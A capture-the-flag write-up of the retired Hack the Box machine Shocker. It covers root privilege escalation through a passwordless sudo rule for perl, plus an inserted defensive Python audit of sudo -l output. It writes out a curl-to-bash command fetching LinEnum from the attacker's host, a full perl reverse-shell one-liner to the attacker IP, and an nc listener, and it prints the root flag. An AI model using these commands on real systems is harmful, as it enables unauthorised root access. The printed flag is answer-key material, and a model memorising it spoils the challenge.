Hack the Box – Shocker – Part 2 (System Flag)

# Information:

Platform Name: Hack the Box

Machine Challenge: Shocker

Machine Status: Retired

Machine Matrix:

  • Enum: 5.5
  • CTF: 5.1
  • Custom: 3.7
  • CVE: 6.3
  • Real: 4.9

Challenge Level: Easy

Part 2: System Flag

Note: This is the continuation of Hack the Box – Shocker – Part 1 (User Flag). Take a look at the first part!

# Writeup: (Continuation)

Step 1

Okay, we now have access to the terminal of the Shocker machine, but we cannot yet access it as root. After trying to change directory to /root I got: “Permission denied”.

We need a way to escalate privileges and get to root. One tool that helps find such a way is LinEnum.sh.

According to DRD_ at Null Byte: LinEnum is a tool used to Identify Potential Privilege Escalation Vectors.

To run LinEnum on the target and see the results, we need to serve the script over HTTP from our machine. To do so I used Python’s SimpleHTTPServer module (Python 2), see the command below:

 mregra on Cyber:VM/HTB/Shocker $ python -m SimpleHTTPServer 7777

After starting the HTTP server we can go back to the remote terminal of the Shocker machine and run the command:

 shelly@Shocker:/usr/lib/cgi-bin$ curl 10.10.14.26:7777/LinEnum.sh | bash

Which returns a long output, like so:

After analyzing the output I was able to find this:

It seems we can run perl commands and files as root without a password!! This is our way in!
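Seen from the defender's side, this finding is a sudoers rule that lets an unprivileged account run an interpreter as root. The following is an added example, not part of the original write-up: a small audit that parses `sudo -l` output and reports such rules. The sample output and the interpreter list are constructed assumptions.

```python
import re

# Assumption: short, non-exhaustive list of programs that execute arbitrary
# code by design; a root sudo rule for one of them amounts to a root shell.
INTERPRETERS = {"perl", "python", "python3", "ruby", "php", "bash", "sh"}
RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")  # "(root) ..."
TAG = re.compile(r"^([A-Z_]+):\s*")                             # "NOPASSWD: "

# Constructed sample in `sudo -l` output format (not captured from the box).
SAMPLE = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (ALL : ALL) /usr/bin/systemctl status nginx, /usr/bin/python3
    (www-data) NOPASSWD: /usr/bin/ruby
"""


def audit_sudo_l(output):
    """Return rules that let the user run an unrestricted interpreter as root."""
    findings, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        runas = {u.strip() for u in m.group("runas").split(":")[0].split(",")}
        if not runas & {"root", "ALL"}:
            continue                      # rule does not grant root
        nopasswd = False                  # a tag applies to later commands too
        for cmd in re.split(r"(?<!\\),", m.group("cmds")):
            cmd = cmd.strip()
            tag = TAG.match(cmd)
            while tag:                    # peel "NOPASSWD:", "SETENV:", ...
                if tag.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag.group(1) == "NOPASSWD"
                cmd = cmd[tag.end():]
                tag = TAG.match(cmd)
            parts = cmd.split()
            # A bare path allows any arguments; fixed arguments narrow the rule.
            if len(parts) == 1 and (parts[0] == "ALL" or
                                    parts[0].rsplit("/", 1)[-1] in INTERPRETERS):
                findings.append({"command": parts[0], "nopasswd": nopasswd,
                                 "severity": "critical" if nopasswd else "high"})
    return findings
```

Run as root, `sudo -l -U <user>` produces this output for any account, so the check can be looped over all local users. A reported rule should be removed or replaced with a rule for a fixed, root-owned script with fixed arguments.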

Step 2

Now we need to create a root reverse shell. To do so, let’s go back to the Pentestmonkey website and get the perl script.

After getting the script, I opened a text editor on my VM and pasted the perl script there. I went back to the Shocker remote terminal and ran sudo -l to discover the full path for perl, which was /usr/bin/perl.

Now, let’s go back to the text editor and let’s edit the perl command. The final command:

sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.26";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

10.10.14.26 is my VM’s IP; you should change that IP to yours.

As you can see, the port I chose was the one that was already there, 1234.

Once the command was configured to our specific case I went back to my VM’s terminal and executed the command:

 mregra on Cyber:VM/HTB/Shocker $ nc -lvnp 1234

This command, as you know from the previous Shocker post, starts a TCP server on port 1234.

Once this was finished I went back to Shocker’s remote terminal and ran the perl command that I previously configured:

As you can see, after running whoami we get “root”. We succeeded in escalating to root!!

After some searching I was able to find the flag at /root/root.txt

Flag: 0b78b642d6b346e155b6ad74cf184a06


Thank you very much for reading!

Cheers,

MRegra
